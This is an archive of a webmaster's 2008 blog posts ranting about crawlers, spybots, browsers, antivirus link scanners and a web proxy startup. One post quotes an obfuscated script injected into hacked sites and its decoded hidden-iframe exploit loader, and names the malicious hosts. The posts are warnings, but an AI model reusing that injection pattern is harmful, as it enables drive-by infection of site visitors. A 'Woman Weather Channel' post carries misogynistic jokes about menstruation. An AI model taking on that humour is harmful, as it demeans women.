Thursday, September 11, 2008

Exploring The Tynted Web

Here we go with Tynt, yet another startup trying to socialize the web.

Joy.

Yesterday there was a little bit of a flap about Tynt as they're running a wide open proxy on tynted.net that allows page hijacking in the search engines.

Today Tynt responded on their blog to the SEO community.

First, we understand that Tynt has the potential to impact the major search engines in ways that were detrimental to the sites being Tynted. Our community recommended blocking spiders from crawling Tynts through the use of a Global Robots Exclusion file (robots.txt) as well as other techniques to minimize the problem. We have already implemented the ROBOTS.TXT file and are working on additional solutions.
That's a noble effort but now anyone running AdSense, YPN or any other contextual network ads are shit out of luck because their bot has to visit the page to serve up the ads. This turns out to be a moot point because allowing the bot also makes the ads go to shit for other reasons explored below.

I think Tynt is missing the point that their proxy server is wide open and can be used by scrapers and other online vermin to access your site although they might be blocked by other means.

Here, try it with Google or Yahoo or whatever you want, wide open and works for anyone and is ripe for abuse including phishing expeditions, very nice.

Shouldn't that proxy only work for registered members that are currently logged in?

Just a thought, I know it's beta and you want to demo some pages, but put a unique key in the URI so that only pages requested from actual Tynt members works with the proxy and it can't be randomly exploited.

For instance, instead of allowing the raw path "google.com.tynted.net" maybe it should be "google.com.someuniquekey.tynted.net".

BTW, pass through the actual end user in your HTTP_X_FORWARDED_FOR field as we don't really find the NAT addresses of your internal servers all that useful.

Moving right along...

On their Twitter bio it says:
Tynt lets you put contextual relevance and dialog on web pages for sharing and interaction.
Listen, if I want dialog on my web pages, I'll put a comments section on the bottom of the pages, I don't need or want your help in this matter.

They clarify this further on the Tynt FAQ page:
Q. What kind of 'stuff' can I put on top of a web page?
A. There is a bunch of different things that you can do to a web page ranging from tools for research like sticky notes and highlighting text, to more fun stuff like text, speech bubbles, graphics and animations. Tynt is a fabulous tool for in context editorializing; in other words, Tynt lets you say what you think right on top of the topic you are talking about.
Lets' see, what does putting things on top of a web page mean? Vandalism, grafitti and lampooning quickly come to mind, something every business online welcomes. Several examples on their site actually show exactly this so no thanks, I think I'll keep my site out of your "stuff".

Wait, it gets even better, we get to foot the extra bandwidth bill for the privilege of letting the Tynt users download our pages just to draw horns and funny faces on our site. Fuck that.

Besides, if you Tynt a blog, forum, or twitter you're actually taking away from the value of those social mediums by breaking up and disjointing the conversation into multiple places which adds no value to the original discussion.

Here's another precious gem from the Tynt FAQ page:
Q. Does Tynt steal my traffic and therefore my revenue?
A. All Tynted web pages, including images, ads and other media all load live from the originating web server so every time a Tynt is viewed the Tynted web site get the ad revenue and traffic.
Holy misconception and major bullshit alert Batman!

Anyone using a context sensitive advertising medium like AdSense and YPN will be in trouble. This is because AdSense and YPN doesn't know their context in relationship to the tynted.net domain name and it shows a bunch of off topic garbage which won't interest the person viewing the page whatsoever.

Want proof?

Let's use a Google AdSense case study site called CoolChaser just to see how well the ads work before and after you run the site through Tynt.

The results we saw were priceless:

Gay Bears Chat anyone?

That's just what my visitors crave, they love big hairy men that like other big hairy men and just can't keep their hands off of them - NOT.

As a matter of fact, something like this happening on a family friendly website could cause a huge problem but we won't delve into those issues at the moment.

Sorry, nothing about your Beta causes this problem as this is how AdSense responds over most any proxy and even in their own cache pages so anyone relying on AdSense or YPN revenue that has traffic redirected through Tynt's proxy will probably just lose out.

One of the Tynters tweeted me:
iancheung @IncrediBILL Tynt drives more people to sites and since people make money by ad views, it actually increases revenue.
I don't see how increased revenue is possible since you can't even see the ads because they're covered up with all those goddamn sticky notes!

From the blog:
Second, site owners have requested the ability to opt-out of having their sites publicly Tynted. We’ve given this a great deal of thought...
I gave it 2 seconds of thought and blocked your IP ranges:
Tynt Multimedia Inc. (TYNTM)
204.244.109.240 - 204.244.109.247
204.244.120.176 - 204.244.120.183
Out of site, out of mind, not a problem.

But wait, they have more in store:
The reason for the gateway (and the different looking URL) is to allow us to insert the JavaScript which loads the Tynt engine for the in-context comments and conversations (and hey, if everyone installs the plug in, then there is no need for our gateway and we can save ourselves the bandwidth and effort there too!).
The end users will be doing the page loading and we'll be unable to see them or stop them from fucking with our pages.

Many webmasters take their livelihoods and reputations very seriously and don't like being fucked with so there needs to be a way to detect the use of Tynt and or a way to opt-out of Tynt before this happens or it could get very ugly.

Last but not least, Tynt has made no mention of how they plan to make money.

Do you ultimately plan on using our sites to trigger your ads?

That's when the shit will really hit the fan.

Have a nice week.

Sunday, September 07, 2008

2008 a Chrome Odyssey

Did Stanley Kubrick join Google marketing?

Ever since Chrome released it's been like watching the online monkeys beat the monolith with bones like the intro of 2001 a Space Odyssey.

Sometimes people just make me want to smack them upside the head the way Gibbs dishes it out to DiNozzo on NCIS.

First, Google releases a beta product and everyone starts reviewing it like it's a finely polished shipping product. For those of you not in the software business there are various levels of beta which typically evolve into final beta, meaning that all features are frozen for that release, Then comes a beta gold candidate which appears to be as bug-free as possible and is about to become a shipping product. The initial release of Chrome is an obvious real beta that they want feedback on so get over it, it's an early beta, it's no where close to a final beta IMO but it's a damn good first release.

Second, a whole bunch of people are trying to steal Google's thunder comparing it to MSIE 8 primarily, which is also still in beta. If Google didn't already have those features coded then they wouldn't be in their initial beta either. It's not like someone at Google woke up on a Monday, read the MSIE 8 feature list, and wrote a whole bunch of new features for Chrome that just showed up in the release on Tuesday, get real. Most of those features were obviously in the works for quite some time but MSIE 8 was publicly known opposed to the closely held secrets of Chrome.

Thirdly, it's mostly just desperate cries for attention and link bait for people that have nothing better to do than bash Google on a good day and how there's more fuel for the fire.

Just remember, the first version of Firefox wasn't much to write home about which was initially distressing considering it's Netscape heritage, but it got better in a hurry until they bloated up Firefox 3, what a slug.

Additionally, Chrome is built on the same rendering engine that runs Safari so it has a lot of history already and should be pretty solid except for it's handling of some plug-ins which will be fixed.

Overall, I'm hopeful that Chrome gets the bugs patched quickly because I love the speed and snappy page displays like you get with Opera without all the javascript quirks.

I just hope it ships with add-on capability or more java script control like Firefox's NoScript and I'll be a happy boy.

Remember people, it's JUST BETA, give them a chance to polish it up.

Tuesday, September 02, 2008

Chrome Shines While Fat Lady Sings for Opera, Firefox and MSIE

I'm very hard to impress, an old school hard core programmer that detests software bloat from lazy assed programmers using poorly implemented cross-platform development environments.


I like fast and lean code, shit that makes an old laptop look all shiny and new and maybe that's why Google named their new browser chrome cause this fucker shines.

It was only yesterday that I threw my hands up in the air and ran screaming from Firefox 3's latest fat, bloated leaky slower than shit browser and declared Opera was one hell of a fast alternative.

Unfortunately, for all of Opera's speed there was a few quirks that meant it wasn't a 100% solution after all starting with the fact that some javascript in Horde Webmail (used in Plesk) had a few problems so it was only 95% usable, still workable and not a show stopper. 

The show stopper was Opera's copy & paste was unable to properly render text to an HMTL editor as the full HTML content that had been copied from a web page was stripped down to plain text. Plain text is expectected when you paste into something like Notepad, but not when you paste into an application capable of negotiating the data type and wishes to receive the full HTML content from the browser.

For us old school Windows programmers this is CLIPBOARD 101 kind of shit and Opera failed the class miserably.

Guess what?

Google chrome in BETA didn't have the javascript glitches in Horde Webmail and it knows how to properly paste HTML text, something Opera has had years to perfect.

Both Opera and Chrome are fast but the devil is in the little details and so far Chrome is in league with the devil.

OK, Chrome doesn't ship with Java, appears to crash with Quicktime (who gives a shit besides Apple and all their cultists) and has a few other plug-in problems, but for a BETA it's fucking phenomenal, it's DA BOMB!

Although I have to ask Google one simple question:

Where's the goddamn TITLE bar and the STATUS bar?

Don't make me drive down to Mtn. View and teach you Windows 101 coding, come on, these should've been there from the get go.

Other than that little peeve, and the lacking of security control given by Firefox add-ons like NoScript, I'm totally stoked. I'll cut Google some slack and assume they'll remedy the missing title and status bar, include Java, fix the quicktime crash, etc. and provide more control over javascript.

Google, a damn fine first showing, hats off, kudos, just fix the rest of this and I'm a solid Chromer for life.

BTW, I'm posting this using Google Chrome so this fucker does work.

YEEE HAW!

Monday, September 01, 2008

Opera 9.5 Smokes Firefox 3

The latest Firefox 3 upgrade was just pitiful and the memory footprint was fatter, it seemed to be leaking memory, page loads just crawled at a snails pace, it was an overall hog.

The options were limited:

- Go back to MSIE 7, which isn't much better, or

- Give Opera one last try as I've always found something that stopped me from using Opera in the past.

Well, the first thing I noticed is Opera 9.5 is faster than shit and loads some pages 3x-5x faster than Firefox, especially my own blog which makes Firefox choke. The second thing I noticed was the footprint of Opera 9.5 is about half that of Firefox when it loads and operates.

Seriously, Opera loaded pages so much faster than Firefox it felt like I was using a new computer!

So now I'm going to give Opera a try and see if there's any gotcha's that will stop me from using it but so far it's looking really good and I may just be the next Opera convert!

BTW, this blog post is my first in Opera!

Sunday, August 31, 2008

MJ12BOT's Dirty Little Secret

Many of you have seen MJ12bot hammering your site from IPs all over the world, both the legit crawler and the fake virus version 1.0.8 as well.

"Mozilla/5.0 (compatible; MJ12bot/v1.2.3; http://www.majestic12.co.uk/bot.php?+)"
Everyone likes an underdog and we tolerate these crawlers when they claim such a noble purpose:
We do spider the Web for the purpose of building a distributed search engine with fast and efficient downloadable distributed crawler that will enable people with broadband connections to help contribute to, what we hope, will become the biggest search engine in the world.
It's been crawling for years and I've never seen any traffic from this damn thing, has anyone?

Then the "offshoot" of this so-called search engine emerges which is Majestic SEO which claims to be a "a commercial offshoot from Majestic-12".

What do they do with the data gathered when they crawl your site?

Here's a direct quote, including typos and bad grammar:
competitive reports are now avaialble, you can buy credits and then use them to see information any domain!
So let's get this right, if we let you crawl our server then you'll let our competitors buy information that can be used against us?

We have a simple solution to this distributed problem:
RewriteCond %{HTTP_USER_AGENT} MJ12bot
RewriteRule .* - [F]
Compete with that.

FireFox 3 Bloated Leaky Pile of Shit

Firefox 3 with all it's much anticipated upgrades turned out to be a big fat flop that's annoying me to the point I'm thinking of switching back to Internet Explorer or giving Opera a try.

Some of the new features seem interesting but overall it's slower, bloated, and appears to be leaking faster than the Titanic after a close encounter with an ice cube.

The damn thing starts at about 40MB and just grows and grows.

Here I'm sitting with a lousy 2 tabs open after using it for a while and it's holding 100MB of memory and not releasing it.

Maybe it's one of the 2 plug-ins I'm using causing the leaks, who knows, but this hog is almost intolerable as it just grows and grows.

Ah well, you gave it a good run Mozilla, time to look elsewhere.

Sunday, August 24, 2008

Woman Weather Channel

During a discussion with a few of my male friends today it became obvious that some of us could benefit from such an online service.

You could have a widget, perhaps a Google Gadget even, sitting on your desktop that declares your woman's current menstrual state such as:

Today: Slightly Spotty
Then you could click on the widget and look at the 5 day forecast and see what's in store for the week:
Mon: Spotty
Tue: Heavy Flow
Wed: Flow
Thu: Spotty
Fri: Clear
Obviously the paid version I'm tentatively calling "Wife Alert" could also send potentially life saving text messages to your cell phone at appropriate times.

It's 6am on that fateful morning when the text message alarm chirps:
"PMS EMERGENCY! THIS IS A HEAVY FLOW DAY! FORGET THE CHILDREN, GET OUT NOW AND SAVE YOURSELF BEFORE IT'S TOO LATE!"
Perhaps even an advance warning system with even more important information such as converging events that could spell disaster if you fuck up.
"WARNING - HEAVY FLOW AND BIRTHDAY BOTH COMING IN 3 DAYS. DON'T FORGET FLOWERS, PRESENTS AND PARTY AS YOUR LIFE COULD DEPEND ON IT!"
Considering how much physical and mental abuse this could potentially save men, it's even possible your health insurance company would pick up the tab to "Wife Alert" as a standard health benefit.

Just like how the weather channel allows you to look up the weather of other locations around the world, the Woman Weather Channel would allow you to look up celebrities online.

Could you imagine tuning in to watch The View when you knew two of the hosts were going to have a bad day at the same time?

The Woman Weather Channel could also be an indispensable resource for anyone in business or politics that could simply avoid any bosses, colleagues or co-workers known to be having a "bad day" until her weather report showed all clear.

The possibilities are endless so tune into the Woman Weather Channel today and all you husbands subscribe to "Wife Alert" as it could be your life it saves!

Thursday, August 14, 2008

How Flawed is Your Anti-Virus?

Some of the anti-virus web surfing protection products are permitting some very risky behavior due to flaws in their basic design. For instance, some of them allow your browser to willingly go to known bad locations they have in their database until something catastrophic gets downloaded. Once the file is downloaded it might be too late so there's the real problem.

Here's a quick for instance, the site "gcounter.cn" was found in an Invisible IFrame launcher yet the page with that code was deemed safe. However, when you go to gcounter.cn, which you should NOT go to as it's very bad, downloads a wide variety of things or randomly redirects you to Google of all places. That redirect to Google is probably tossed in there to throw people off the path trying to figure out if this is the source of the virus, but that's another story.

Anyway, several anti-virus and link scanning products just ignored the fact that this site is known to be bad and let me visit these pages without so much as a warning. Better yet, when I fed some infected pages directly into my browser just to see what happened, they couldn't detect the Invisible IFrame launcher script properly, and even when they did, didn't stop me from running the page at that time or even pop a warning!

Why?

Because gcounter.cn, like many other malware sites, wasn't downloading a bad file at that particular instance. However, a few minutes later the malicious files were flowing from gcounter.cn again and then the anti-virus woke up, finally.

Shouldn't the fact that gcounter.cn downloads any malware be enough of a reason to set off some alarms and stop people dead in their tracks from going there?

Apparently not.

It appears that hackers have a leg up on spoofing the malware scanning software and the anti-virus developers so it's no wonder that machines are getting hacked all over the place.

Although the anti-virus products do add some value to protecting surfers they unfortunately cause more harm than good by giving a false sense of security. With the massive gaping holes in their technology the only try way to surf safe is using NoScript since no javascript whatsoever means no Invisible Iframe launcher tricks.

I'm not going to name which anti-virus products I tested at this time because I'd like to give them time to fix their products before exposing their shoddy methodologies and putting their customers at risk being more of a target than they already are.

Come on anti-virus writers, get your shit together before I lose my shit and do a real expose!

Addendum:

The one interesting twist in the Invisible Iframe launcher script that I found this time is that it was injected into a common javascript file shared site wide instead of just being inserted into the home page. This is a nasty strategy twist that gives the hackers a bigger bang for their buck by getting more infected pages with a lot less work and the code isn't in the HTML file which is where most people would look first.

Thursday, July 24, 2008

SEO Community in TailSphinn

I tried to support Sphinn's efforts by putting the SphinnIt button on my site to help raise awareness of what they were trying to do with something unique for the SEO community.

Unfortunately, Sphinn devolved into a bunch of Sphamm and when one of their members pointed out how widespread the problem was they banned Edward. OK, Edward (pageoneresults) can push the envelope a little but it wasn't out of disrespect, he was making a very public spectacle to get them off their dead asses to fix the problem.

So EvilGreenMonkey of Sphinn even admitted Edward was right:

The person highlighted in Aaron's post has had their account terminated, there is no need to interact with them further. The findings highlighted in his comments were not new or truely condemning. Yes, people spam Sphinn - we remove the spam. Yes, submit.php URLs were getting indexed - although from Google indexing WP social media plugin links rather than spamming. Fixes to these problems were either already implemented or scheduled for release before said user started his campaign. I'll make no further comment on this post and suggest that we leave it at that.
So instead of saying "Thank you for bringing it to our attention" and "We're working on the problem" with a proposed implementation date, they just ban him and that's when all hell broke loose in the SEO blogosphere.

No only that, shouldn't the Sphinn members get an apology from Sphinn for forcing us to suffer through all that Sphamm which one simple NOFOLLOW would've stopped from the beginning?

Perhaps Sphinn bears some of the blame here because if "his comments were not new or truely condemning" then you allowed the situation to continue unabated until one of your members simply couldn't take it anymore.

So Sphinn members had to put up with Sphamm for a year and not even a simple apology but they shot the messenger that finally snapped, good going Sphinn.

Right on the heels of this they decide to take a swipe at Kimberly Bock and threatened to ban her for some hypocritical horseshit.
1. Your flame post submitted by another user, which went Hot on Sphinn, was removed due to 26 Desphinns and many complaints.
2. The posts about your personal life had no internet marketing relevance and are seen as off-topic/spam.
So let's review Kimberly's plight as she was a) threatened over a post that someone else submitted to Sphinn and b) claiming that 2 SEOs getting married isn't news.

Holy mother of horseshit, have they lost their minds?

I find their current heavy handed reputation management tactics too autocratic to support Sphinn anymore simply because the good of the community isn't being served when criticism is swept under the rug and attempted to be squelched instead of addressed.

The Sphinn button is off my site because I certainly wouldn't want to be associated with all the vapid top 10 lists being submitted and I sure as hell don't want someone yelling at me about material on my site not being suitable in the event someone else Sphinn's it, such as happened to Kimberly.

Maybe someday if Sphinn gets their act together and stops shooting the messengers and they improve the quality of their content, the SphinnIt button will return.

Until that day, SphuckIt!

Sunday, July 06, 2008

iPowerWeb Hacking Continues

Over a year ago I wrote about a bunch of iPowerWeb's shared servers being hacked, and it looked like they were trying to clean it up, but now it's time for round two of hacking.

The latest batch of hacked sites may have a DNS hack as well, I'm not sure that's the case but Alex seems to think it is.

All these sites have the following Whois Name Server entries:

Name Server: NS1.IPOWERDNS.COM
Name Server: NS1.IPOWERWEB.NET
Sure looks like iPowerWeb, right?

But the reverse DNS all goes to IPs on *.static.eigbox.net which links to BIZLAND

Here's a sample of the javascript in this round of site hacking:
eval(unescape("%77%69%6e%64%6f%77%2e%73%74...."));
Don't go to the link below if you know what's good for you, it's not safe.

The javascript above, when decoded, is the following:
window.status='Done';document.write('<iframe name=f2f8f656791 src=\'http:// 58.65.232.*/gpack/index.php?'+Math.round(Math.random()*74880)+'2\' width=480 height=156 style=\'display: none\'></iframe>')
You guessed it, bad things happen at 58.65.232.33 which APNIC claims to be hostfresh.com out of Honk Kong which has a San Francisco mailbox according to their website.

Can someone explain why this exploit site still exists if these guys are doing business with a US address and all hell isn't raining down on their parade?

I don't get it, the web has gone mad...

Tuesday, June 17, 2008

AVG 8 LinkScanner Fiasco Recap

For those of you that might've missed the whole AVG 8 LinkScanner disaster and ensuing AVG reputation nightmare, here's a quick recap and links to places to read all the details.

Webmasters started noticing a rash of distributed IP's with the same user agent, no referrer, and a few other technical issues I won't go into now, that suddenly started pounding their sites:

Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;1813)
At first I thought it looked like a botnet scraper but soon someone figured out it was related to the new release of AVG 8 that included a LinkScanner that was amusingly called "Safe Search" which is now not-so-safe since everyone knows how to spoof it.

The story was first broken on WebmasterWorld, then again on The Register, then a follow up on WebmasterWorld and a few other places. The best part of the story on The Register actually unfolds in the comments section which is now over 200 posts but has some good comments if you're willing to wade through it all.

It appears this Safe Search link scanning was a knee jerk reaction to McAfee's SiteAdvisor. SiteAdvisor uses stale search results to flag sites with known exploits. However, Safe Search, much to everyone's dismay, hits all sites in real-time to check for exploits for every single search. The most amusing aspect is that the very AVG feature which is supposed to make the internet safer has been attacking sites and become malware itself.

Here's a list of all the major points so far:

1. AVG 8 appears to be causing an escalating DDoS attack as more and more AVG users upgrade causing some sites to be hit by many thousands of unique IPs per day.

2. AVG's Safe Search is causing webmaster analytics worldwide to be totally skewed unless you filter out the ";1813" user agent.

3. AVG 8 is exposing their customer information to sites their customer didn't even visit and potentially setting them all up for some future exploit. They'll be targets for direct marketing to switch to a new AV product at a minimum with savvy affiliates making out like bandits.

4. The Safe Search link scanner has the potential to automatically access sites that aren't allowed at work, could violate your ISP's AUP or be illegal in some jurisdictions. This could result in reprimand, losing your ISP or potentially being flagged in honeypot sites for illicit activities.

5. The malicious sites can already fake the Safe Search code which appears to put users of the free AVG 8 at risk. The risk is because you only get Safe Search, the link scanner which is being spoofed, but you don't get Safe Surf, which stops HTML exploits as you load the page. It appears you need a paid version of AVG 8 to actually be protected from online exploits so be careful where you surf using the free version of AVG 8.


Well, that's the recap in a nutshell.

This just goes to show you how the best intentions can have disastrous results when people don't think about the consequences of their actions, especially when dealing with an installed base of this scale.

Thursday, May 22, 2008

Did CSC's Spybot Get Caught?

Looks like yet another corporate compliance spybot is hitting our servers, not like we need yet another spybot.

There's only one IP out of this entire range that consistently hits my servers.

OrgName: Corporation Service Company
OrgID: CORPO-9-Z
NetRange: 165.160.0.0 - 165.160.255.255

They claim to crawl the web:

Our proprietary technology scans and digests web pages, images and other Internet content around the clock to locate critical occurrences of online brand abuse.
Yet again, nobody has ever seen a crawler name in use so I'll hazard a guess it doesn't read or respect robots.txt when it's crawling, or possibly trespassing, on our servers.

I'd post more about the specifics on this one but I really don't want them to wise up too much because some of the things their crawler does, while pretending to be a browser, trips several alarms in my bot blocker.

Kind of hard to digest web pages when you're busy digesting error pages instead!

Just another day of the internet version of Spy vs Spy.

Monday, May 12, 2008

Impact On Your Bandwidth Will Be Minimal My Ass

How often do we see that happy line of horse shit spread by every new startup that crawls the web about how minimal it's impact will be?

Every fucking one of them claim it but when you add them all together the bot traffic is quickly exceeding the human traffic.

Who the fuck am I kidding, on most sites the bots clearly out number the humans in pages read on a daily basis.

First we put the big search engines on top of the heap with Google, Yahoo and MSN crawling the crap out of your servers daily. Just the three of these guys can easily read as many pages as 10K visitors a day. Then throw in the wannabe search engines like Ask, Gigablast, Snap, Fast, etc. ad nauseam and it's over the top.

Now expand that list to include the international search engines like Baidu, Sogou, Orange's ViolaBot, Majestic12, Yodao, and on and on, tons of 'em.

Then we have all the spybots that feel entitled to crawl your site like Picscout, Cyveillance, Monitor110, Picmole, RTGI, and on and on.

Next add up all the specialty niche bots like Become, Pronto, OptionCarriere, ShopWiki, and all sorts of shit too numerous to mention.

Pile on top of this all the free fucking tools that every little shithead and make believe company uses to scrounge the 'net for god knows what, and god's not telling, like Nutch and Heritrix, plus the web downloaders, offline readers, and more.

Don't forget, many of these so-called search engines and shit now want screen shots as well so after they crawl your page they send a copy of Firefox or something to your site to download every page again plus every fucking image, never cached, over and over and over.

Did I forget to mention directories?

They'll want to link check you and get screen shots as well, don't leave them out or they'll feel fucking neglected.

Wait, there's more, those social sites like Eurekster, Jeteye, etc. that let people link to your shit and then come back banging on your site all the time to make sure that shit's still valid.

Then add up all the RSS feed readers and aggregators that pull down your RSS feeds that nobody ever fucking reads. Not to mention the RSS feed finders like IEAutodiscovery that run amok on your site just looking for RSS feeds ... FUCK!

If you run affiliate programs you have CJ quality bot or some shit hitting your site and if you run ads then the Google quality bot, it's always something.

Don't forget the assholes running the dark underbelly of the web with all the scrapers, spam harvesters, forum, blog and wiki spammers, botnets and other malicious shit pounding on our sites daily.

Add on top of all this shit Firefox, Google Web Accelerator and now AVG's toolbar all pre-fetching pages that will most likely never be read and holy shit, we're being swamped!

OK, now that we've identified all this bot traffic, where's all the fucking people?

Of course you think all those hits from MSIE and Firefox are people, right?

Hell no!

Are you out of your fucking mind?

Those hits are the scrapers, screen shot makers and companies like Cyveillance and Picscout that don't want you to stop them from crawling your site so they just pretend to be humans to get past the bot blockers.

Well guess what?

There are no fucking people on your site. the internet is now run for and used exclusively by bots.

Apparently you missed the memo.

Comparing Effectiveness of Anti-Virus Web Protection Methods

There's three basic methods being used at the moment to protect web surfers from potential dangers which are static (stale), active and passive.

Static Web Protection

Various companies use the static method which relies on crawling the web in advance to find vulnerabilities and then attempt to warn visitors about these problems as they are about to visit a web site. McAfee's SiteAdvisor and Google both take this approach and it's obviously only as good as your last scan and the malware can easily be cloaked and hidden from these somewhat obvious crawlers. Besides easily being fooled with cloaking, the data is always stale meaning sites good even 10 minutes ago could now be infested with malware and sites previously infested could have been cleaned.

This method isn't optimum for anyone and can be a nightmare for websites tagged as bad to get off the warning list assuming they ever find out they're on it in the first place as their business goes down in flames from traffic going elsewhere.

Active Web Protection

The latest AVG 8 includes a Link Scanner and AVG Search-Shield which aggressively checks pages in Google search results that you're about to visit in real time to help protect the surfer. Unfortunately, AVG made several mistakes, some that could be deemed fatal flaws, which allows this technology to be easily identified so that malware and phishing sites can easily cloak to avoid AVG's detection. Even worse for webmasters is that AVG pre-fetches pages in search results and as adoption of this latest AVG toolbar increases, it is quickly turning into a potential DoS attack on popular sites that show up at the top of Google's most popular searches.

While I think AVG's intentions were good, their current implementation easily identifies every customer using their product and causes webmasters needless bandwidth issues that could be easily resolved on their part with a cache server.

Passive Web Protection

The method used by Avast's Anti-Virus is to use a transparent HTTP proxy meaning that all of your HTTP requests pass through in invisible intermediate proxy service that scans for potential problems in the data stream in real-time. The data is always fresh, checked in real-time, the user agent doesn't change and there are no pre-fetches or needless redundant hits on websites.

The only downside is you don't know the site is bad in advance but that can easily be the case with static protection due to stale data and/or cloaking and active protection due to cloaking.


The Best of All


While the three approaches all have their potential problems it appears a combination of all three is probably the best approach.

Bad Site Database:
The SiteAdvisor/Google type database approach is good to log all known bad sites so they don't get a second chance to fool the other methods with cloaking once their are caught. This cuts down on redundantly checking known bad sites until the webmaster cleans it up and requests a review to clear their site's bad name.

Perhaps the Bad Site database concept needs to become a non-profit dot org so that all of the anti-virus companies can freely feed and use this database without all the corporate walls built up around the ownership of the data for the greater good, something like a SpamHaus type of thing or perhaps merged into SpamHaus.

Optimized Pre-Screening:
The AVG approach of pre-screening a site could be optimized by fixing the toolbar's user agent so it's not detectable and use a shared cache server to avoid behaving like a DoS attack on popular websites. The beauty is that the collective mind of all these toolbars with an undetectable user agent avoids the cloaking used to thwart detection associated with known crawlers. If the toolbar fed the results of these bad sites to the Bad Site Database, then there's a win-win for everyone.

Transparent Screening:
The final approach used by Avast should still be performed which is the HTTP proxy screening to that any site that manages to not be in the bad site database and still eludes the active pre-screening of pages, would hopefully get snared as the page loads into the machine.

Summary

When you pile up all of this security the chances of failure still exist but the end user is protected and informed as much as humanly possible from all of the threats present.

It would certainly be nice to see some of the anti-virus providers combine their efforts as outlined above to make the internet a safer place to visit.

Sunday, April 27, 2008

Off By More Than One

Can you believe that someone is actually surfing the web using some free browser called Off By One that doesn't appear to have been updated in the last 2 years?

The user agent is as follows:

"Mozilla/6.0(compatible;OffByOne;Windows 2000)"
The irregular formatting convention triggered the bot trap with the lack of spaces alone.

Then it claims to be Mozilla 6.0 when it's probably Mozilla 3.0 at best.

Considering how few times, if ever, that this browser has visited it's obviously very rare.

Maybe some online nerd activist will get it declared as an endangered online species so it will become protected by law.

Don't laugh, you know it'll happen eventually...

Sunday, April 20, 2008

Reciprocal Link Exchange? Let's Swap!

For years I've been deleting all those emails asking me to exchange links and I won't swap links with any of that crap.

Suddenly I've had an epiphany and YES!, now I'll swap links with you, no problem!

I'm only agreeing to swap links as requested.

I'm not using NOFOLLOW on those links as requested.

You can see my links when you visit, online and visible as agreed.

Unfortunately my link swapping page will never be seen by Google, Yahoo, MSN or any other search engine but you'll see it just fine.

I'm going to hold up my end of the bargain, we swapped links, how about you?

Kaushik, What Freaking Experiments?

I found this user agent coming out of Microsoft's Area 131 requesting that people "contact kaushik for these experiments" that kept hitting one of my servers.

131.107.0.96 "contact kaushik for these experiments"
So I did a little data mining of my own and searched Microsoft and couldn't decide if this experiment was from Kaushik #1 or Kaushik #2.

Both Kaushik's appear to be working for the Data Management, Exploration and Mining Group (DMX) at Microsoft, but which one ran this experiment?

OK, will the real Kaushik running these experiments please stand up?

BTW, was your experiment finding sites running bot blockers?

If so, you succeeded and your requests were stopped. ;)

DNS Right But User Agent Wrong

Ran into a user agent from DNSRight today that claimed to be some link check tool that doesn't appear on their site.

66.240.236.220 "GET / "
"http://www.dnsright.com/" "DNSRight.com WebBot Link Ckeck Tool. Report abuse to: dnsr@dnsright.com"
So I ran some of their other tools that don't identify themselves at all.
66.240.236.220 "GET / HTTP/1.1" "-" "-"
They host this mess at cari.net so just block 'em.
OrgName: California Regional Intranet, Inc.
NetRange: 66.240.192.0 - 66.240.255.255
CIDR: 66.240.192.0/18
No more DNS Right or Left, it's now DNS Gone.

Thursday, April 17, 2008

Picmole, Yet Another Spybot!

There must be good money spying on everyone because it seems a new company springs up almost weekly trying to claim their stake in this new gold rush.

How many fucking spybots do we need?

Today on the spybot circuit the we're serving up a helping of Picmole that's using heritrix to do it's crawling. Surprisingly it still checks robots.txt but who knows if they'll honor it down the road because honoring robots.txt conflicts with accomplishing their stated goals.

Identifying their spider properly and crawling from easily identifiable IPs will also present them problems as their activities increase but being a new service they'll soon figure that out and probably go stealth like all the rest.

208.109.189.127 [ip-208-109-189-127.ip.secureserver.net.] requested 1 pages as "Mozilla/5.0 (compatible; heritrix/1.12.0 +http://www.picmole.com)"
Sorry, but your bot hit a firewall on your first attempt.

Abort, Retry, Ignore?

Favcollector Bandwidth Waster

Here's another product of Canada doing the stupidest shit ever seen, collecting favicons.

It came and grabbed my icon, then hit the home page which the bot blocker promptly stopped, so who the knows what else it would've done beyond that.

66.207.217.138 [gaspra.crazylogic.net.] "Favcollector/2.0 (info@favcollector.com http://www.favcollector.com/)"
From their FAQ:
Favcollector is a spider that searches the internet for favicons. It downloads and stores these favicons for each site it visits. It will go back once a month to see if the favicon has changed and will download the new icon if it is has, effictivly creating an archive of all favicons on the internet.
Spider?

Spider my ass...

Spiders ask for robots.txt files, read them, and go away.

Not this piece of shit as it just comes and it takes what it wants without regard to the webmasters wishes.

Not only that, a bunch of trademarked icons are now on their site without permission which will most likely make some crazed trademark enforcers start jumping up and down once they find that site.

BTW, run a damn spell checker on your site as the word is effectively, not "effictivly" unless that's the Canadian spelling.

Canasasearchbot For Canasians, Oh Canasa!

It's hard to resist commenting on a bot that can't even spell it's own name or it's country name correctly.

206.248.137.34 [mycanadasearch.ca.] "canasasearchbot(http://www.mycanadasearch.ca/robots.html)"
However they got it right on their robots page:
User-agent: canadasearchbot
It did ask for robots.txt but who knows if it was looking for "canasasearchbot" or "canadasearchbot", total crap shoot.

I tried their little search engine and it took it a really long time to come back with some really bad results.

Here's a "search tip", try searching your log file and examine what your crawler is putting in that log file before turning it loose on the world.

Nothing like that fine Canadian quality, eh?


Monday, April 14, 2008

Mozshot Tries Taking a Screenshot

Yet another Firefox-based screen shot tool hit my other site today just in time to take a screen shot of an error message telling them they weren't allowed to take screen shots without permission.

Details:

61.206.125.245 [tempest.nemui.org.]
"Mozilla/5.0 (Gecko/20070310 Mozshot/0.0.20070628; http://mozshot.nemui.org/)"
This thing appears to be open source, oh joy...

Friday, April 11, 2008

RTGI - The French Social Media Spybot

Yet another social media mining operation designed to track every bit of intel said about brands, people, politics and more.

From a translation of their site:

Our solutions simplify the identification of influential communities and monitoring of their conversations, to the benefit of businesses, communication agencies or research institutes.

RTGI's approach allows the analysis of the links and content generated by the citizens, journalists, consumers or activists, to draw the contours of communities conversations around your issues, brands and products and their real impact on your image online. RTGI have elaborated the linkfluence to give a unit of reliable measurement of the influence of the social web sites.
The highlighting was added to help you see how it facilitates spying on your ass without going to much effort to do so.

Heck, the French government is in their list of clients!
  • Information Service (GIS) government
  • Ministry of the Economy, Finance and Employment Ministry of the Economy, Finance and Employment
  • Picardy Regional Council (RENUPI)
Sheesh, didn't need to translate as they have an English .EU version too.

Oh well, I'm not rewriting it!

Continuing on...

George Orwell obviously didn't anticipate the internet and he was off by a few years, 24 to be exact, but his overall message of Big Brother watching us in 1984 is finally coming true in 2008.

Anyway, back to the details:
